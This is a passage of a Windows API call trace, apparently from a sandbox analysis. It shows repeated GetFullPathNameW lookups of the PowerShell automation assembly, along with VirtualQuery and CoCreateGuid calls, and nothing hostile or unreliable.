	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.055] VirtualQuery (in: lpAddress=0x1cbdf0, lpBuffer=0x1cccb0, dwLength=0x30 | out: lpBuffer=0x1cccb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.057] VirtualQuery (in: lpAddress=0x1cbdf0, lpBuffer=0x1cccb0, dwLength=0x30 | out: lpBuffer=0x1cccb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.060] VirtualQuery (in: lpAddress=0x1cbdf0, lpBuffer=0x1cccb0, dwLength=0x30 | out: lpBuffer=0x1cccb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.060] VirtualQuery (in: lpAddress=0x1cbdf0, lpBuffer=0x1cccb0, dwLength=0x30 | out: lpBuffer=0x1cccb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.061] VirtualQuery (in: lpAddress=0x1cb4e0, lpBuffer=0x1cc3a0, dwLength=0x30 | out: lpBuffer=0x1cc3a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.061] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.061] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.062] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.062] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.062] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.062] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.063] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.063] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.063] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.063] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.063] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.548] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0321.549] VirtualQuery (in: lpAddress=0x1cb920, lpBuffer=0x1cc7e0, dwLength=0x30 | out: lpBuffer=0x1cc7e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0321.549] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0321.550] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.551] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.552] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.552] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1df49a87, Data2=0xd713, Data3=0x4c38, Data4=([0]=0x82, [1]=0xad, [2]=0x9, [3]=0xc9, [4]=0xb4, [5]=0x64, [6]=0xf2, [7]=0x99))) returned 0x0
	[0321.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
